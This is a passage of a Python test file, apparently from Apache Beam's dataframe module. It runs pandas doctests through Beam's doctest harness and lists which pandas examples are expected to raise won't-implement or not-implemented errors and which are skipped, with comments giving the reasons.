[\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.generic.NDFrame.tail': ['*'],\n 'pandas.core.generic.NDFrame.take': ['*'],\n 'pandas.core.generic.NDFrame.values': ['*'],\n 'pandas.core.generic.NDFrame.tz_localize': [\n \"s.tz_localize('CET', ambiguous='infer')\",\n # np.array is not a deferred object. This use-case is possible\n # with a deferred Series though, which is tested in\n # frames_test.py\n \"s.tz_localize('CET', ambiguous=np.array([True, True, False]))\",\n ],\n 'pandas.core.generic.NDFrame.truncate': [\n # These inputs rely on tail (wont implement, order\n # sensitive) for verification\n \"df.tail()\",\n \"df.truncate(before=pd.Timestamp('2016-01-05'),\\n\"\n \" after=pd.Timestamp('2016-01-10')).tail()\",\n \"df.truncate('2016-01-05', '2016-01-10').tail()\",\n \"df.loc['2016-01-05':'2016-01-10', :].tail()\"\n ],\n 'pandas.core.generic.NDFrame.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.generic.NDFrame.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.generic.NDFrame.sort_values': ['*'],\n 'pandas.core.generic.NDFrame.mask': [\n 'df.where(m, -df) == np.where(m, df, -df)'\n ],\n 'pandas.core.generic.NDFrame.where': [\n 'df.where(m, -df) == np.where(m, df, -df)'\n ],\n 'pandas.core.generic.NDFrame.interpolate': ['*'],\n 'pandas.core.generic.NDFrame.resample': ['*'],\n 'pandas.core.generic.NDFrame.rolling': ['*'],\n # argsort wont implement\n 'pandas.core.generic.NDFrame.abs': [\n 'df.loc[(df.c - 43).abs().argsort()]',\n ],\n 'pandas.core.generic.NDFrame.reindex': ['*'],\n 'pandas.core.generic.NDFrame.pct_change': ['*'],\n 'pandas.core.generic.NDFrame.asof': ['*'],\n 'pandas.core.generic.NDFrame.infer_objects': ['*'],\n 'pandas.core.generic.NDFrame.ewm': ['*'],\n 'pandas.core.generic.NDFrame.expanding': ['*'],\n 'pandas.core.generic.NDFrame.get': ['*'],\n },\n not_implemented_ok={\n 'pandas.core.generic.NDFrame.asof': ['*'],\n 'pandas.core.generic.NDFrame.at_time': ['*'],\n 'pandas.core.generic.NDFrame.between_time': ['*'],\n 'pandas.core.generic.NDFrame.ewm': ['*'],\n 'pandas.core.generic.NDFrame.expanding': ['*'],\n 'pandas.core.generic.NDFrame.flags': ['*'],\n 'pandas.core.generic.NDFrame.rank': ['*'],\n 'pandas.core.generic.NDFrame.reindex_like': ['*'],\n 'pandas.core.generic.NDFrame.replace': ['*'],\n 'pandas.core.generic.NDFrame.sample': ['*'],\n 'pandas.core.generic.NDFrame.set_flags': ['*'],\n 'pandas.core.generic.NDFrame.squeeze': ['*'],\n 'pandas.core.generic.NDFrame.truncate': ['*'],\n },\n skip={\n # Internal test\n 'pandas.core.generic.NDFrame._set_axis_name': ['*'],\n # Fails to construct test series. asfreq is not implemented anyway.\n 'pandas.core.generic.NDFrame.asfreq': ['*'],\n 'pandas.core.generic.NDFrame.astype': ['*'],\n 'pandas.core.generic.NDFrame.convert_dtypes': ['*'],\n 'pandas.core.generic.NDFrame.copy': ['*'],\n 'pandas.core.generic.NDFrame.droplevel': ['*'],\n 'pandas.core.generic.NDFrame.get': ['*'],\n 'pandas.core.generic.NDFrame.rank': [\n # Modified dataframe\n 'df'\n ],\n 'pandas.core.generic.NDFrame.rename': [\n # Seems to be an upstream bug. The actual error has a different\n # message:\n # TypeError: Index(...) must be called with a collection of\n # some kind, 2 was passed\n # pandas doctests only verify the type of exception\n 'df.rename(2)'\n ],\n # For pandas >= 1.4, rename is changed to _rename\n 'pandas.core.generic.NDFrame._rename': [\n # Seems to be an upstream bug. The actual error has a different\n # message:\n # TypeError: Index(...) must be called with a collection of\n # some kind, 2 was passed\n # pandas doctests only verify the type of exception\n 'df.rename(2)'\n ],\n # Tests rely on setting index\n 'pandas.core.generic.NDFrame.rename_axis': ['*'],\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.generic.NDFrame.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.generic.NDFrame.squeeze': ['*'],\n\n # NameError\n 'pandas.core.generic.NDFrame.resample': ['df'],\n\n # Skipped so we don't need to install natsort\n 'pandas.core.generic.NDFrame.sort_values': [\n 'from natsort import index_natsorted',\n 'df.sort_values(\\n'\n ' by=\"time\",\\n'\n ' key=lambda x: np.argsort(index_natsorted(df[\"time\"]))\\n'\n ')'\n ],\n **skip_writes\n })\n self.assertEqual(result.failed, 0)\n\n def test_dataframe_tests(self):\n result = doctests.testmod(\n pd.core.frame,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.frame.DataFrame.T': ['*'],\n 'pandas.core.frame.DataFrame.cummax': ['*'],\n 'pandas.core.frame.DataFrame.cummin': ['*'],\n 'pandas.core.frame.DataFrame.cumsum': ['*'],\n 'pandas.core.frame.DataFrame.cumprod': ['*'],\n 'pandas.core.frame.DataFrame.diff': ['*'],\n 'pandas.core.frame.DataFrame.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.frame.DataFrame.items': ['*'],\n 'pandas.core.frame.DataFrame.itertuples': ['*'],\n 'pandas.core.frame.DataFrame.iterrows': ['*'],\n 'pandas.core.frame.DataFrame.iteritems': ['*'],\n # default keep is 'first'\n 'pandas.core.frame.DataFrame.nlargest': [\n \"df.nlargest(3, 'population')\",\n \"df.nlargest(3, ['population', 'GDP'])\",\n \"df.nlargest(3, 'population', keep='last')\"\n ],\n 'pandas.core.frame.DataFrame.nsmallest': [\n \"df.nsmallest(3, 'population')\",\n \"df.nsmallest(3, ['population', 'GDP'])\",\n \"df.nsmallest(3, 'population', keep='last')\",\n ],\n 'pandas.core.frame.DataFrame.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.frame.DataFrame.to_records': ['*'],\n 'pandas.core.frame.DataFrame.to_dict': ['*'],\n 'pandas.core.frame.DataFrame.to_numpy': ['*'],\n 'pandas.core.frame.DataFrame.to_string': ['*'],\n 'pandas.core.frame.DataFrame.transpose': ['*'],\n 'pandas.core.frame.DataFrame.shape': ['*'],\n 'pandas.core.frame.DataFrame.shift': [\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.frame.DataFrame.unstack': ['*'],\n 'pandas.core.frame.DataFrame.memory_usage': ['*'],\n 'pandas.core.frame.DataFrame.info': ['*'],\n # Not equal to df.agg('mode', axis='columns', numeric_only=True)\n # because there can be multiple columns if a row has more than one\n # mode\n 'pandas.core.frame.DataFrame.mode': [\n \"df.mode(axis='columns', numeric_only=True)\"\n ],\n 'pandas.core.frame.DataFrame.append': [\n 'df.append(df2, ignore_index=True)',\n \"for i in range(5):\\n\" +\n \" df = df.append({'A': i}, ignore_index=True)\",\n ],\n 'pandas.core.frame.DataFrame.sort_index': ['*'],\n 'pandas.core.frame.DataFrame.sort_values': ['*'],\n 'pandas.core.frame.DataFrame.melt': [\n \"df.melt(id_vars=['A'], value_vars=['B'])\",\n \"df.melt(id_vars=['A'], value_vars=['B', 'C'])\",\n \"df.melt(col_level=0, id_vars=['A'], value_vars=['B'])\",\n \"df.melt(id_vars=[('A', 'D')], value_vars=[('B', 'E')])\",\n \"df.melt(id_vars=['A'], value_vars=['B'],\\n\" +\n \" var_name='myVarname', value_name='myValname')\"\n ],\n # Most keep= options are order-sensitive\n 'pandas.core.frame.DataFrame.drop_duplicates': ['*'],\n 'pandas.core.frame.DataFrame.duplicated': [\n 'df.duplicated()',\n \"df.duplicated(keep='last')\",\n \"df.duplicated(subset=['brand'])\",\n ],\n 'pandas.core.frame.DataFrame.reindex': ['*'],\n 'pandas.core.frame.DataFrame.dot': [\n # reindex not supported\n 's2 = s.reindex([1, 0, 2, 3])',\n ],\n 'pandas.core.frame.DataFrame.resample': ['*'],\n 'pandas.core.frame.DataFrame.values': ['*'],\n },\n not_implemented_ok={\n 'pandas.core.frame.DataFrame.transform': [\n # str arg not supported. Tested with np.sum in\n # frames_test.py::DeferredFrameTest::test_groupby_transform_sum\n \"df.groupby('Date')['Data'].transform('sum')\",\n ],\n 'pandas.core.frame.DataFrame.swaplevel': ['*'],\n 'pandas.core.frame.DataFrame.melt': ['*'],\n 'pandas.core.frame.DataFrame.reindex_axis': ['*'],\n 'pandas.core.frame.DataFrame.round': [\n 'df.round(decimals)',\n ],\n\n # We should be able to support pivot and pivot_table for categorical\n # columns\n 'pandas.core.frame.DataFrame.pivot': ['*'],\n\n # Trivially elementwise for axis=columns. Relies on global indexing\n # for axis=rows.\n # Difficult to determine proxy, need to inspect function\n 'pandas.core.frame.DataFrame.apply': ['*'],\n\n # Cross-join not implemented\n 'pandas.core.frame.DataFrame.merge': [\n \"df1.merge(df2, how='cross')\"\n ],\n\n # TODO(BEAM-11711)\n 'pandas.core.frame.DataFrame.set_index': [\n \"df.set_index([s, s**2])\",\n ],\n\n 'pandas.core.frame.DataFrame.set_axis': [\n \"df.set_axis(range(0,2), axis='index')\",\n ],\n\n # TODO(BEAM-12495)\n 'pandas.core.frame.DataFrame.value_counts': [\n 'df.value_counts(dropna=False)'\n ],\n },\n skip={\n # DataFrame construction from a dictionary and\n # Series requires using the len() function, which\n # is a non-deferred operation that we do not allow\n 'pandas.core.frame.DataFrame': [\n 'pd.DataFrame(data=d, index=[0, 1, 2, 3])',\n ],\n # s2 created with reindex\n 'pandas.core.frame.DataFrame.dot': [\n 'df.dot(s2)',\n ],\n\n 'pandas.core.frame.DataFrame.resample': ['df'],\n 'pandas.core.frame.DataFrame.asfreq': ['*'],\n # Throws NotImplementedError when modifying df\n 'pandas.core.frame.DataFrame.axes': [\n # Returns deferred index.\n 'df.axes',\n ],\n # Skipped because the relies on loc to set cells in df2\n 'pandas.core.frame.DataFrame.compare': ['*'],\n 'pandas.core.frame.DataFrame.cov': [\n # Relies on setting entries ahead of time.\n \"df.loc[df.index[:5], 'a'] = np.nan\",\n \"df.loc[df.index[5:10], 'b'] = np.nan\",\n 'df.cov(min_periods=12)',\n ],\n 'pandas.core.frame.DataFrame.rename': [\n # Returns deferred index.\n 'df.index',\n 'df.rename(index=str).index',\n ],\n 'pandas.core.frame.DataFrame.set_index': [\n # TODO(BEAM-11711): This could pass in the index as\n # a DeferredIndex, and we should fail it as order-sensitive.\n \"df.set_index([pd.Index([1, 2, 3, 4]), 'year'])\",\n ],\n 'pandas.core.frame.DataFrame.set_axis': [\n # This should pass as set_axis(axis='columns')\n # and fail with set_axis(axis='index')\n \"df.set_axis(['a', 'b', 'c'], axis='index')\"\n ],\n 'pandas.core.frame.DataFrame.to_markdown': ['*'],\n 'pandas.core.frame.DataFrame.to_parquet': ['*'],\n\n # Raises right exception, but testing framework has matching issues.\n # Tested in `frames_test.py`.\n 'pandas.core.frame.DataFrame.insert': [\n 'df',\n 'df.insert(1, \"newcol\", [99, 99])',\n 'df.insert(0, \"col1\", [100, 100], allow_duplicates=True)'\n ],\n\n 'pandas.core.frame.DataFrame.to_records': [\n 'df.index = df.index.rename(\"I\")',\n 'index_dtypes = f\"<S{df.index.str.len().max()}\"', # 1.x\n 'index_dtypes = \"<S{}\".format(df.index.str.len().max())', #0.x\n 'df.to_records(index_dtypes=index_dtypes)',\n ],\n # These tests use the static method pd.pivot_table, which doesn't\n # actually raise NotImplementedError\n 'pandas.core.frame.DataFrame.pivot_table': ['*'],\n # Expected to raise a ValueError, but we raise NotImplementedError\n 'pandas.core.frame.DataFrame.pivot': [\n \"df.pivot(index='foo', columns='bar', values='baz')\"\n ],\n 'pandas.core.frame.DataFrame.append': [\n 'df',\n # pylint: disable=line-too-long\n \"pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],\\n\"\n \" ignore_index=True)\"\n ],\n 'pandas.core.frame.DataFrame.eval': ['df'],\n 'pandas.core.frame.DataFrame.melt': [\n \"df.columns = [list('ABC'), list('DEF')]\", \"df\"\n ],\n 'pandas.core.frame.DataFrame.merge': [\n # Order-sensitive index, checked in frames_test.py.\n \"df1.merge(df2, left_on='lkey', right_on='rkey')\",\n \"df1.merge(df2, left_on='lkey', right_on='rkey',\\n\"\n \" suffixes=('_left', '_right'))\",\n \"df1.merge(df2, how='left', on='a')\",\n ],\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.frame.DataFrame.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.frame.DataFrame.to_sparse': ['type(df)'],\n\n # Skipped because \"seen_wont_implement\" is reset before getting to\n # these calls, so the NameError they raise is not ignored.\n 'pandas.core.frame.DataFrame.T': [\n 'df1_transposed.dtypes', 'df2_transposed.dtypes'\n ],\n 'pandas.core.frame.DataFrame.transpose': [\n 'df1_transposed.dtypes', 'df2_transposed.dtypes'\n ],\n # Skipped because the relies on iloc to set a cell to NA. Test is\n # replicated in frames_test::DeferredFrameTest::test_applymap.\n 'pandas.core.frame.DataFrame.applymap': [\n 'df_copy.iloc[0, 0] = pd.NA',\n \"df_copy.applymap(lambda x: len(str(x)), na_action='ignore')\",\n ],\n # Skipped so we don't need to install natsort\n 'pandas.core.frame.DataFrame.sort_values': [\n 'from natsort import index_natsorted',\n 'df.sort_values(\\n'\n ' by=\"time\",\\n'\n ' key=lambda x: np.argsort(index_natsorted(df[\"time\"]))\\n'\n ')'\n ],\n # Mode that we don't yet support, documentation added in pandas\n # 1.2.0 (https://github.com/pandas-dev/pandas/issues/35912)\n 'pandas.core.frame.DataFrame.aggregate': [\n \"df.agg(x=('A', max), y=('B', 'min'), z=('C', np.mean))\"\n ],\n })\n self.assertEqual(result.failed, 0)\n\n def test_series_tests(self):\n result = doctests.testmod(\n pd.core.series,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.series.Series.__array__': ['*'],\n 'pandas.core.series.Series.array': ['*'],\n 'pandas.core.series.Series.cummax': ['*'],\n 'pandas.core.series.Series.cummin': ['*'],\n 'pandas.core.series.Series.cumsum': ['*'],\n 'pandas.core.series.Series.cumprod': ['*'],\n 'pandas.core.series.Series.diff': ['*'],\n 'pandas.core.series.Series.dot': [\n 's.dot(arr)', # non-deferred result\n ],\n 'pandas.core.series.Series.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.series.Series.info': ['*'],\n 'pandas.core.series.Series.items': ['*'],\n 'pandas.core.series.Series.iteritems': ['*'],\n # default keep is 'first'\n 'pandas.core.series.Series.nlargest': [\n \"s.nlargest()\",\n \"s.nlargest(3)\",\n \"s.nlargest(3, keep='last')\",\n ],\n 'pandas.core.series.Series.memory_usage': ['*'],\n 'pandas.core.series.Series.nsmallest': [\n \"s.nsmallest()\",\n \"s.nsmallest(3)\",\n \"s.nsmallest(3, keep='last')\",\n ],\n 'pandas.core.series.Series.pop': ['*'],\n 'pandas.core.series.Series.searchsorted': ['*'],\n 'pandas.core.series.Series.shift': [\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.series.Series.take': ['*'],\n 'pandas.core.series.Series.to_dict': ['*'],\n 'pandas.core.series.Series.unique': ['*'],\n 'pandas.core.series.Series.unstack': ['*'],\n 'pandas.core.series.Series.values': ['*'],\n 'pandas.core.series.Series.view': ['*'],\n 'pandas.core.series.Series.append': [\n 's1.append(s2, ignore_index=True)',\n ],\n 'pandas.core.series.Series.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.series.Series.sort_index': ['*'],\n 'pandas.core.series.Series.sort_values': ['*'],\n 'pandas.core.series.Series.argmax': ['*'],\n 'pandas.core.series.Series.argmin': ['*'],\n 'pandas.core.series.Series.drop_duplicates': [\n 's.drop_duplicates()',\n \"s.drop_duplicates(keep='last')\",\n ],\n 'pandas.core.series.Series.reindex': ['*'],\n 'pandas.core.series.Series.autocorr': ['*'],\n 'pandas.core.series.Series.repeat': ['s.repeat([1, 2, 3])'],\n 'pandas.core.series.Series.resample': ['*'],\n 'pandas.core.series.Series': ['ser.iloc[0] = 999'],\n },\n not_implemented_ok={\n 'pandas.core.series.Series.transform': [\n # str arg not supported. Tested with np.sum in\n # frames_test.py::DeferredFrameTest::test_groupby_transform_sum\n \"df.groupby('Date')['Data'].transform('sum')\",\n ],\n 'pandas.core.series.Series.groupby': [\n 'ser.groupby([\"a\", \"b\", \"a\", \"b\"]).mean()',\n 'ser.groupby([\"a\", \"b\", \"a\", np.nan]).mean()',\n 'ser.groupby([\"a\", \"b\", \"a\", np.nan], dropna=False).mean()',\n ],\n 'pandas.core.series.Series.swaplevel' :['*']\n },\n skip={\n # Relies on setting values with iloc\n 'pandas.core.series.Series': ['ser', 'r'],\n 'pandas.core.series.Series.groupby': [\n # TODO(BEAM-11393): This example requires aligning two series\n # with non-unique indexes. It only works in pandas because\n # pandas can recognize the indexes are identical and elide the\n # alignment.\n 'ser.groupby(ser > 100).mean()',\n ],\n 'pandas.core.series.Series.asfreq': ['*'],\n # error formatting\n 'pandas.core.series.Series.append': [\n 's1.append(s2, verify_integrity=True)',\n ],\n 'pandas.core.series.Series.cov': [\n # Differs in LSB on jenkins.\n \"s1.cov(s2)\",\n ],\n # Skipped idxmax/idxmin due an issue with the test framework\n 'pandas.core.series.Series.idxmin': ['s.idxmin()'],\n 'pandas.core.series.Series.idxmax': ['s.idxmax()'],\n 'pandas.core.series.Series.duplicated': ['*'],\n 'pandas.core.series.Series.set_axis': ['*'],\n 'pandas.core.series.Series.nonzero': ['*'],\n 'pandas.core.series.Series.pop': ['ser'], # testing side effect\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.series.Series.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.series.Series.searchsorted': [\n # This doctest seems to be incorrectly parsed.\n \"x = pd.Categorical(['apple', 'bread', 'bread',\"\n ],\n 'pandas.core.series.Series.to_csv': ['*'],\n 'pandas.core.series.Series.to_markdown': ['*'],\n 'pandas.core.series.Series.update': ['*'],\n 'pandas.core.series.Series.view': [\n # Inspection after modification.\n 's'\n ],\n 'pandas.core.series.Series.resample': ['df'],\n })\n self.assertEqual(result.failed, 0)\n\n def test_string_tests(self):\n if PD_VERSION < (1, 2):\n module = pd.core.strings\n else:\n # Definitions were moved to accessor in pandas 1.2.0\n module = pd.core.strings.accessor\n\n module_name = module.__name__\n\n result = doctests.testmod(\n module,\n use_beam=False,\n wont_implement_ok={\n # These methods can accept deferred series objects, but not lists\n f'{module_name}.StringMethods.cat': [\n \"s.str.cat(['A', 'B', 'C', 'D'], sep=',')\",\n \"s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')\",\n \"s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')\"\n ],\n f'{module_name}.StringMethods.repeat': [\n 's.str.repeat(repeats=[1, 2, 3])'\n ],\n f'{module_name}.str_repeat': ['s.str.repeat(repeats=[1, 2, 3])'],\n # get_dummies pandas examples are not casted to CategoricalDtype\n # Must be CategoricalDtype to work in Beam\n f'{module_name}.StringMethods.get_dummies': ['*'],\n f'{module_name}.str_get_dummies': ['*'],\n f'{module_name}.StringMethods': ['s.str.split(\"_\")'],\n f'{module_name}.StringMethods.rsplit': ['*'],\n f'{module_name}.StringMethods.split': ['*'],\n },\n skip={\n # count() on Series with a NaN produces mismatched type if we\n # have a NaN-only partition.\n f'{module_name}.StringMethods.count': [\"s.str.count('a')\"],\n f'{module_name}.str_count': [\"s.str.count('a')\"],\n\n # Bad test strings in pandas 1.1.x\n f'{module_name}.str_replace': [\n \"pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)\"\n ],\n f'{module_name}.StringMethods.replace': [\n \"pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)\"\n ],\n\n # output has incorrect formatting in 1.2.x\n f'{module_name}.StringMethods.extractall': ['*']\n })\n self.assertEqual(result.failed, 0)\n\n def test_datetime_tests(self):\n # TODO(BEAM-10721)\n indexes_accessors_result = doctests.testmod(\n pd.core.indexes.accessors,\n use_beam=False,\n skip={\n 'pandas.core.indexes.accessors.TimedeltaProperties': [\n # Seems like an upstream bug. The property is 'second'\n 'seconds_series.dt.seconds'\n ],\n\n # TODO(BEAM-12530): Test data creation fails for these\n # s = pd.Series(pd.to_timedelta(np.arange(5), unit=\"d\"))\n # pylint: disable=line-too-long\n 'pandas.core.indexes.accessors.DatetimeProperties.to_pydatetime': [\n '*'\n ],\n 'pandas.core.indexes.accessors.TimedeltaProperties.components': [\n '*'\n ],\n 'pandas.core.indexes.accessors.TimedeltaProperties.to_pytimedelta': [\n '*'\n ],\n # pylint: enable=line-too-long\n })\n datetimelike_result = doctests.testmod(\n pd.core.arrays.datetimelike, use_beam=False)\n\n datetime_result = doctests.testmod(\n pd.core.arrays.datetimes,\n use_beam=False,\n wont_implement_ok={\n 'pandas.core.arrays.datetimes.DatetimeArray.to_period': ['*'],\n # All tz_localize tests use unsupported values for ambiguous=\n # Verified seperately in\n # frames_test.py::DeferredFrameTest::test_dt_tz_localize_*\n 'pandas.core.arrays.datetimes.DatetimeArray.tz_localize': ['*'],\n },\n not_implemented_ok={\n # Verifies index version of this method\n 'pandas.core.arrays.datetimes.DatetimeArray.to_period': [\n 'df.index.to_period(\"M\")'\n ],\n })\n\n self.assertEqual(indexes_accessors_result.failed, 0)\n self.assertEqual(datetimelike_result.failed, 0)\n self.assertEqual(datetime_result.failed, 0)\n\n def test_indexing_tests(self):\n result = doctests.testmod(\n pd.core.indexing,\n use_beam=False,\n skip={\n 'pandas.core.indexing._IndexSlice': ['*'],\n 'pandas.core.indexing.IndexingMixin.at': ['*'],\n 'pandas.core.indexing.IndexingMixin.iat': ['*'],\n 'pandas.core.indexing.IndexingMixin.iloc': ['*'],\n 'pandas.core.indexing.IndexingMixin.loc': ['*'],\n 'pandas.core.indexing._AtIndexer': ['*'],\n 'pandas.core.indexing._LocIndexer': ['*'],\n 'pandas.core.indexing._iAtIndexer': ['*'],\n 'pandas.core.indexing._iLocIndexer': ['*'],\n })\n self.assertEqual(result.failed, 0)\n\n def test_groupby_tests(self):\n result = doctests.testmod(\n pd.core.groupby.groupby,\n use_beam=False,\n wont_implement_ok={\n 'pandas.core.groupby.groupby.GroupBy.head': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.tail': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.nth': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.cumcount': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.resample': ['*'],\n },\n not_implemented_ok={\n 'pandas.core.groupby.groupby.GroupBy.ngroup': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.sample': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.rank': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.nth': [\n \"df.groupby('A', as_index=False).nth(1)\",\n ],\n },\n skip={\n # Uses iloc to mutate a DataFrame\n 'pandas.core.groupby.groupby.GroupBy.resample': [\n 'df.iloc[2, 0] = 5',\n 'df',\n ],\n # df is reassigned\n 'pandas.core.groupby.groupby.GroupBy.rank': ['df'],\n # TODO: Raise wont implement for list passed as a grouping column\n # Currently raises unhashable type: list\n 'pandas.core.groupby.groupby.GroupBy.ngroup': [\n 'df.groupby([\"A\", [1,1,2,3,2,1]]).ngroup()'\n ],\n })\n self.assertEqual(result.failed, 0)\n\n result = doctests.testmod(\n pd.core.groupby.generic,\n use_beam=False,\n wont_implement_ok={\n # Returns an array by default, not a Series. WontImplement\n # (non-deferred)\n 'pandas.core.groupby.generic.SeriesGroupBy.unique': ['*'],\n # TODO: Is take actually deprecated?\n 'pandas.core.groupby.generic.DataFrameGroupBy.take': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.take': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.nsmallest': [\n \"s.nsmallest(3, keep='last')\",\n \"s.nsmallest(3)\",\n \"s.nsmallest()\",\n ],\n 'pandas.core.groupby.generic.SeriesGroupBy.nlargest': [\n \"s.nlargest(3, keep='last')\",\n \"s.nlargest(3)\",\n \"s.nlargest()\",\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.diff': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.diff': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.hist': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.groupby.generic.SeriesGroupBy.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n },\n not_implemented_ok={\n 'pandas.core.groupby.generic.DataFrameGroupBy.idxmax': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.idxmin': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.transform': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmax': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmin': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.apply': ['*'],\n },\n skip={\n 'pandas.core.groupby.generic.SeriesGroupBy.cov': [\n # Floating point comparison fails\n 's1.cov(s2)',\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.cov': [\n # Mutates input DataFrame with loc\n # TODO: Replicate in frames_test.py\n \"df.loc[df.index[:5], 'a'] = np.nan\",\n \"df.loc[df.index[5:10], 'b'] = np.nan\",\n \"df.cov(min_periods=12)\",\n ],\n # These examples rely on grouping by a list\n 'pandas.core.groupby.generic.SeriesGroupBy.aggregate': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.aggregate': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.transform': [\n # Dropping invalid columns during a transform is unsupported.\n 'grouped.transform(lambda x: (x - x.mean()) / x.std())'\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.transform': [\n # Dropping invalid columns during a transform is unsupported.\n 'grouped.transform(lambda x: (x - x.mean()) / x.std())'\n ],\n # Skipped idxmax/idxmin due an issue with the test framework\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmin': ['s.idxmin()'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmax': ['s.idxmax()'],\n # Uses as_index, which is currently not_implemented\n 'pandas.core.groupby.generic.DataFrameGroupBy.value_counts': [\n \"df.groupby('gender', as_index=False).value_counts()\",\n # pylint: disable=line-too-long\n \"df.groupby('gender', as_index=False).value_counts(normalize=True)\",\n ],\n })\n self.assertEqual(result.failed, 0)\n\n def test_top_level(self):\n tests = {\n name: func.__doc__\n for (name, func) in pd.__dict__.items()\n if _is_top_level_function(func) and getattr(func, '__doc__', None)\n }\n\n # IO methods are tested in io_test.py\n skip_reads = {name: ['*'] for name in dir(pd) if name.startswith('read_')}\n\n result = doctests.teststrings(\n tests,\n use_beam=False,\n report=True,\n not_implemented_ok={\n 'concat': ['pd.concat([s1, s2], ignore_index=True)'],\n 'crosstab': ['*'],\n 'cut': ['*'],\n 'eval': ['*'],\n 'get_dummies': ['*'],\n 'infer_freq': ['*'],\n 'lreshape': ['*'],\n 'melt': ['*'],\n 'merge': [\"df1.merge(df2, how='cross')\"],\n 'merge_asof': ['*'],\n 'pivot': ['*'],\n 'pivot_table': ['*'],\n 'qcut': ['*'],\n 'reset_option': ['*'],\n 'set_eng_float_format': ['*'],\n 'set_option': ['*'],\n 'to_numeric': ['*'],\n 'to_timedelta': ['*'],\n 'unique': ['*'],\n 'wide_to_long': ['*'],\n },\n wont_implement_ok={\n 'factorize': ['*'],\n 'to_datetime': ['s.head()'],\n 'to_pickle': ['*'],\n 'melt': [\n \"pd.melt(df, id_vars=['A'], value_vars=['B'])\",\n \"pd.melt(df, id_vars=['A'], value_vars=['B', 'C'])\",\n \"pd.melt(df, col_level=0, id_vars=['A'], value_vars=['B'])\",\n \"pd.melt(df, id_vars=[('A', 'D')], value_vars=[('B', 'E')])\",\n \"pd.melt(df, id_vars=['A'], value_vars=['B'],\\n\" +\n \" var_name='myVarname', value_name='myValname')\"\n ],\n },\n skip={\n # error formatting\n 'concat': ['pd.concat([df5, df6], verify_integrity=True)'],\n # doctest DeprecationWarning\n 'melt': ['df'],\n # Order-sensitive re-indexing.\n 'merge': [\n \"df1.merge(df2, left_on='lkey', right_on='rkey')\",\n \"df1.merge(df2, left_on='lkey', right_on='rkey',\\n\"\n \" 